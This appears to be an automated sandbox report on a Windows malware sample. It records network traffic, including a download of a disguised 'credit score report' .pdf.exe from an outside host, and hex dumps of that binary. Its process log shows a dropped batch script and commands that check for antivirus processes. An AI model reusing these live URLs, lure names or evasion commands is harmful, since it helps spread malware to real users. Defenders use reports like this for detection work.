                                                                                                                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 36 30 2e 39 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 36 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: { "geoplugin_request":"81.181.60.92", "geoplugin_status":206, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"", "geoplugin_region":"", "geoplugin_regionCode":"", "geoplugin_regionName":"", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.1449", "geoplugin_longitude":"8.1551", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9088}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449754208.95.112.1805632C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:37.173465967 CEST117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                Host: ip-api.com
                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                User-Agent: python-urllib3/2.2.1
                                                                                                                                                                                                                                May 8, 2024 16:41:37.336184025 CEST174INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:36 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                X-Ttl: 60
                                                                                                                                                                                                                                X-Rl: 44
                                                                                                                                                                                                                                Data Raw: 74 72 75 65 0a
                                                                                                                                                                                                                                Data Ascii: true


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.449753178.237.33.50802004C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:41.289315939 CEST233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                content-length: 110
                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449731104.21.79.2294432120C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-05-08 14:40:10 UTC58OUTGET /1gFnW4 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Nathan
                                                                                                                                                                                                                                Host: 2no.co
                                                                                                                                                                                                                                2024-05-08 14:40:11 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:40:11 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                set-cookie: 538816161370831964=3; expires=Thu, 08 May 2025 14:40:11 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                set-cookie: clhf03028ja=81.181.60.92; expires=Thu, 08 May 2025 14:40:11 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                memory: 0.42098236083984375
                                                                                                                                                                                                                                expires: Wed, 08 May 2024 14:40:11 +0000
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                strict-transport-security: max-age=604800
                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Yn0QHXfu9eAP%2FXRQZbHZGsWAqFeNEdZK34LUluSJKm19Tji0ENnRbohGUimLle49er1HHlccCFASYoKuKkUcgZ%2Bi6LW2SCr%2F8fNCqgn6jnhsuti4VoScMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 880a34151b7708a1-SEA
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-05-08 14:40:11 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                2024-05-08 14:40:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.44974365.108.69.934432580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-05-08 14:41:11 UTC259OUTGET /YourCreditScore-ReportFileNumber-73211fcf-78f6-daeb-5650-a152fc5bfdcd-431a0807-57f0-cc80-d209-2cpdf.exe HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Host: makemoneyminds.com
                                                                                                                                                                                                                                2024-05-08 14:41:11 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                last-modified: Mon, 06 May 2024 09:54:24 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                content-length: 8850847
                                                                                                                                                                                                                                date: Wed, 08 May 2024 14:41:11 GMT
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                2024-05-08 14:41:11 UTC982INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 f9 bf b1 91 98 d1 e2 91 98 d1 e2 91 98 d1 e2 da e0 d2 e3 99 98 d1 e2 da e0 d4 e3 2d 98 d1 e2 da e0 d5 e3 9b 98 d1 e2 91 98 d1 e2 90 98 d1 e2 97 19 2c e2 95 98 d1 e2 97 19 d4 e3 b9 98 d1 e2 97 19 d5 e3 80 98 d1 e2 97 19 d2 e3 80 98 d1 e2 da e0 d0 e3 9a 98 d1 e2 91 98 d0 e2 1f 98 d1 e2 fe 19 d5 e3 84 98 d1 e2 fe 19 d3 e3 90 98 d1 e2 52 69 63 68 91 98 d1 e2 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-,Rich
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC14994INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 53 48 83 ec 20 e8 45 f7 00 00 48 8b 18 e8 35 f7 00 00 48 8b d3 8b 08 e8 93 79 00 00 48 8b d8 e8 23 f7 00 00 48 8b d3 8b 08 48 83 c4 20 5b e9 2c 29 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 51 13 04 00 c3 cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 53 55 56 57 41 56 41 57 48 81 ec 88 00 00 00 33 c0 4d 8b f0 48 8b da 48 89 44 24 50 48 8b f9 48 89 44 24 58 48 8d 15 db b5 02 00 48 89 44 24 60 44 8d 40 58 89 44 24 28 48 8d 4c 24 20 48 89 44 24 20 49 8b f1 8b e8 e8 9a a7 00 00 44 8b f8 85 c0 74 26 48 8d 53 12 44 8b c0 48 8d 0d b5 b5 02 00 e8 50 1a 00 00 8d 45 ff 48 81 c4 88 00 00 00 41 5f 41 5e 5f 5e 5d 5b c3 b9 00
                                                                                                                                                                                                                                Data Ascii: @SH EH5HyH#HH [,)HQHT$HL$SUVWAVAWH3MHHD$PHHD$XHHD$`D@XD$(HL$ HD$ IDt&HSDHPEHA_A^_^][
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: e8 a3 75 00 00 48 8b 9c 24 a0 20 00 00 48 81 c4 80 20 00 00 5f c3 cc cc 48 83 ec 28 44 8b 05 79 b2 03 00 41 81 e8 34 01 00 00 74 5d 41 83 e8 01 74 32 41 83 e8 01 74 1c 41 83 e8 01 74 06 41 83 f8 01 75 3b 4c 8d 82 70 10 00 00 48 8d 91 10 01 00 00 eb 1b 4c 8d 82 70 10 00 00 48 8d 91 f8 00 00 00 eb 0b 4c 8d 82 70 10 00 00 48 8d 51 68 e8 f4 fa ff ff 85 c0 78 07 33 c0 48 83 c4 28 c3 b8 ff ff ff ff 48 83 c4 28 c3 4c 8d 82 70 10 00 00 48 8d 51 68 e8 cf fa ff ff 33 c9 85 c0 0f 99 c1 8d 41 ff 48 83 c4 28 c3 44 8b 05 ed b1 03 00 41 81 e8 34 01 00 00 74 44 41 83 e8 01 74 3e 41 83 e8 01 74 25 41 83 e8 01 74 0c 41 83 f8 01 74 06 b8 ff ff ff ff c3 4c 8d 82 70 40 00 00 48 8d 91 20 01 00 00 e9 7f fa ff ff 4c 8d 82 70 40 00 00 48 8d 91 08 01 00 00 e9 6c fa ff ff 4c 8d 82
                                                                                                                                                                                                                                Data Ascii: uH$ H _H(DyA4t]At2AtAtAu;LpHLpHLpHQhx3H(H(LpHQh3AH(DA4tDAt>At%AtAtLp@H Lp@HlL
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: f8 cc 00 00 4c 8b f8 48 85 c0 74 5b 8b 84 24 80 00 00 00 41 b9 ff ff ff ff 48 89 5c 24 38 4d 8b c5 48 89 5c 24 30 33 d2 89 44 24 28 b9 e9 fd 00 00 4c 89 7c 24 20 ff 15 e4 36 02 00 85 c0 74 1e 4c 89 3f ff c5 48 83 c7 08 48 ff c6 41 3b ec 7d 64 4c 8b bc 24 88 00 00 00 e9 5a ff ff ff 48 8d 15 43 63 02 00 eb 17 48 8d 15 ea 62 02 00 48 8d 0d 1b 63 02 00 eb 0e 48 8d 15 ea 62 02 00 48 8d 0d bb 62 02 00 e8 ce 9e ff ff 48 89 1f 48 85 f6 78 17 66 0f 1f 44 00 00 49 8b 0c de e8 63 cc 00 00 48 ff c3 48 3b de 7e ef 49 8b ce e8 53 cc 00 00 33 c0 eb 07 4b 89 1c e6 49 8b c6 48 8b 7c 24 48 48 8b 74 24 50 48 8b 6c 24 58 48 8b 9c 24 98 00 00 00 4c 8b 6c 24 40 48 83 c4 60 41 5f 41 5e 41 5c c3 cc cc cc cc cc 48 83 ec 28 48 8b 0d 55 84 03 00 ff 15 0f 36 02 00 48 c7 05 44 84 03
                                                                                                                                                                                                                                Data Ascii: LHt[$AH\$8MH\$03D$(L|$ 6tL?HHA;}dL$ZHCcHbHcHbHbHHxfDIcHH;~IS3KIH|$HHt$PHl$XH$Ll$@H`A_A^A\H(HU6HD
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 03 c8 81 39 50 45 00 00 75 20 b8 0b 02 00 00 66 39 41 18 75 15 83 b9 84 00 00 00 0e 76 0c 83 b9 f8 00 00 00 00 0f 95 c0 eb 02 32 c0 48 83 c4 28 c3 cc cc cc 48 8d 0d 0d 00 00 00 48 ff 25 4e f7 01 00 cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 19 48 8b f9 81 3b 63 73 6d e0 75 1c 83 7b 18 04 75 16 8b 53 20 8d 82 e0 fa 6c e6 83 f8 02 76 15 81 fa 00 40 99 01 74 0d 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 e8 4a 08 00 00 48 89 18 48 8b 5f 08 e8 52 08 00 00 48 89 18 e8 7e e6 00 00 cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 1d 23 f3 02 00 48 8d 3d 1c f3 02 00 eb 12 48 8b 03 48 85 c0 74 06 ff 15 14 f9 01 00 48 83 c3 08 48 3b df 72 e9 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 1d ef f2 02 00 48 8d 3d e8 f2 02
                                                                                                                                                                                                                                Data Ascii: 9PEu f9Auv2H(HH%NH\$WH HH;csmu{uS lv@tH\$03H _JHH_RH~H\$WH H#H=HHtHH;rH\$0H _H\$WH HH=
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 83 c4 28 c3 48 89 5c 24 08 4c 89 4c 24 20 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 48 8b 9c 24 90 00 00 00 4d 8b f0 48 8b f2 4c 8b e1 4d 85 c0 74 1a 4d 85 c9 74 15 48 85 c9 75 27 e8 0a 52 00 00 c7 00 16 00 00 00 e8 e3 ab 00 00 33 c0 48 8b 5c 24 70 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 48 85 db 74 0e 33 d2 48 83 c8 ff 49 f7 f6 4c 3b c8 76 2b 48 83 fe ff 74 12 4c 8b c6 33 d2 e8 91 aa 01 00 4c 8b 8c 24 88 00 00 00 48 85 db 74 a9 33 d2 48 83 c8 ff 49 f7 f6 4c 3b c8 77 9b 8b 43 14 90 a9 c0 04 00 00 74 05 8b 4b 20 eb 05 b9 00 10 00 00 49 8b fe 89 8c 24 90 00 00 00 49 0f af f9 4d 8b d4 4c 89 64 24 20 48 8b ef 4c 8b ee 48 85 ff 0f 84 41 01 00 00 8b 43 14 ba ff ff ff 7f 90 a9 c0 04 00 00 74 76 4c 63 7b 10 45 85 ff 74 6d 0f 88 4d 01 00 00 49 3b ef 44
                                                                                                                                                                                                                                Data Ascii: (H\$LL$ UVWATAUAVAWH0H$MHLMtMtHu'R3H\$pH0A_A^A]A\_^]Ht3HIL;v+HtL3L$Ht3HIL;wCtK I$IMLd$ HLHACtvLc{EtmMI;D
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 00 75 f7 48 8b 6c 24 70 b0 01 48 8b 74 24 78 89 53 48 48 8b 5c 24 68 48 83 c4 50 5f c3 cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 54 48 83 ec 50 83 49 28 10 48 8b d9 8b 41 30 41 bc df ff 00 00 85 c0 79 1c 0f b7 41 3a 66 83 e8 41 66 41 23 c4 66 f7 d8 1b c0 83 e0 f9 83 c0 0d 89 41 30 eb 1c 75 1a 66 83 79 3a 67 74 07 66 83 79 3a 47 75 0c c7 41 30 01 00 00 00 b8 01 00 00 00 4c 8b 41 08 48 8d 79 50 05 5d 01 00 00 48 8b cf 48 63 d0 e8 b2 c9 ff ff 41 b8 00 02 00 00 84 c0 75 24 48 83 bb 58 04 00 00 00 75 05 41 8b c0 eb 0a 48 8b 83 50 04 00 00 48 d1 e8 8d 90 a3 fe ff ff 89 53 30 eb 03 8b 53 30 48 8b 87 08 04 00 00 48 85 c0 48 0f 44 c7 48 89 43 40 33 c0 48 8b 4b 18 48 89 44 24 70 48 8d 41 08 48 89 43 18 4c 8b 93 58 04 00 00 f2 0f 10 01 4c 8b 5b 08 48 8b 33 0f
                                                                                                                                                                                                                                Data Ascii: uHl$pHt$xSHH\$hHP_H\$Hl$VWATHPI(HA0AyA:fAfA#fA0ufy:gtfy:GuA0LAHyP]HHcAu$HXuAHPHS0S0HHHDHC@3HKHD$pHAHCLXL[H3
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 12 00 00 48 8b d9 48 8b f9 48 3b ce 74 12 48 8b cf ff 15 d9 37 01 00 48 83 c7 48 48 3b fe 75 ee 48 8b cb e8 70 2c 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 57 48 83 ec 30 8b f1 81 f9 00 20 00 00 72 29 e8 f0 d1 ff ff bb 09 00 00 00 89 18 e8 c8 2b 00 00 8b c3 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 48 83 c4 30 41 5f c3 33 ff 8d 4f 07 e8 b6 86 00 00 90 8b df 8b 05 f5 92 02 00 48 89 5c 24 20 3b f0 7c 36 4c 8d 3d e5 8e 02 00 49 39 3c df 74 02 eb 22 e8 90 fe ff ff 49 89 04 df 48 85 c0 75 05 8d 78 0c eb 14 8b 05 c4 92 02 00 83 c0 40 89 05 bb 92 02 00 48 ff c3 eb c1 b9 07 00 00 00 e8 c4 86 00 00 8b c7 eb 8a 48 63 d1 4c 8d 05 9e 8e 02 00 48 8b c2 83 e2 3f 48 c1 f8 06 48 8d 0c d2 49 8b 04 c0 48 8d 0c
                                                                                                                                                                                                                                Data Ascii: HHH;tH7HHH;uHp,H\$0Ht$8H _H\$Ht$H|$AWH0 r)+H\$@Ht$HH|$PH0A_3OH\$ ;|6L=I9<t"IHux@HHcLH?HHIH
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC16384INData Raw: 54 24 30 ff 15 bf f8 00 00 85 c0 74 59 80 bc 24 a0 00 00 00 02 75 54 48 8b 4c 24 38 4c 8d 8c 24 b8 00 00 00 d1 ed 49 8b d7 44 8b c5 48 89 74 24 20 ff 15 99 f8 00 00 85 c0 75 1f ff 15 ff f5 00 00 8b c8 e8 78 91 ff ff 83 cf ff 48 8b cb e8 45 ec ff ff 8b c7 e9 7f 01 00 00 8b 84 24 b8 00 00 00 8d 3c 47 eb 40 40 88 74 24 48 48 8b 4c 24 38 4c 8d 8c 24 b8 00 00 00 44 8b c5 48 89 74 24 20 49 8b d7 ff 15 0f f8 00 00 85 c0 0f 84 f4 00 00 00 44 39 a4 24 b8 00 00 00 0f 87 e6 00 00 00 03 bc 24 b8 00 00 00 48 8b 54 24 40 4c 8d 1d d6 4e 02 00 49 8b 04 d3 42 38 74 f0 38 7d 8e 80 bc 24 a0 00 00 00 02 4c 63 c7 74 25 4c 8b 8c 24 a8 00 00 00 49 8b c4 48 d1 e8 49 8b d7 41 8b cd 48 89 44 24 20 e8 d4 f8 ff ff 8b f8 e9 5c ff ff ff 49 d1 e8 40 38 74 24 48 74 7a 4c 8b 54 24 50 49
                                                                                                                                                                                                                                Data Ascii: T$0tY$uTHL$8L$IDHt$ uxHE$<G@@t$HHL$8L$DHt$ ID9$$HT$@LNIB8t8}$Lct%L$IHIAHD$ \I@8t$HtzLT$PI
                                                                                                                                                                                                                                2024-05-08 14:41:12 UTC408INData Raw: cb 84 c0 75 d8 eb 06 45 88 11 4c 8b cb 49 3b db 4c 89 0f 4d 0f 45 d3 49 8b c2 48 8b 4c 24 40 48 33 cc e8 81 b5 fe ff 48 83 c4 50 5f 5e 5b c3 e8 a8 b6 fe ff cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 33 c0 4c 8b c2 48 89 01 48 8b d9 89 41 08 41 be 20 00 00 00 8b 05 d9 0e 02 00 89 41 04 0f b7 02 eb 08 49 83 c0 02 41 0f b7 00 66 41 3b c6 74 f2 66 83 f8 61 74 21 66 83 f8 72 74 12 66 83 f8 77 0f 85 75 02 00 00 c7 01 01 03 00 00 eb 0f c7 41 04 01 00 00 00 eb 0d c7 01 09 01 00 00 c7 41 04 02 00 00 00 49 83 c0 02 b2 01 33 ed 44 8a cd 40 8a fd 44 8a d5 44 8a dd 8d 75 0a 66 41 39 28 0f 84 48 01 00 00 41 0f b7 08 83 f9 53 0f 87 a5 00 00 00 0f 84 88 00 00 00 41 2b ce 0f 84 17 01 00 00 83 e9 0b 74 48 83 e9 01 74 3b 83 e9 18
                                                                                                                                                                                                                                Data Ascii: uELI;LMEIHL$@H3HP_^[HHXHhHpHx AVH 3LHHAA AIAfA;tfat!frtfwuAAI3D@DDufA9(HASA+tHt;


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:16:40:03
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Og1SeeXcB2.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:795'405 bytes
                                                                                                                                                                                                                                MD5 hash:150E9FFDAC7F2361C2EFA735929AA268
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:16:40:06
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:16:40:07
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:16:40:07
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
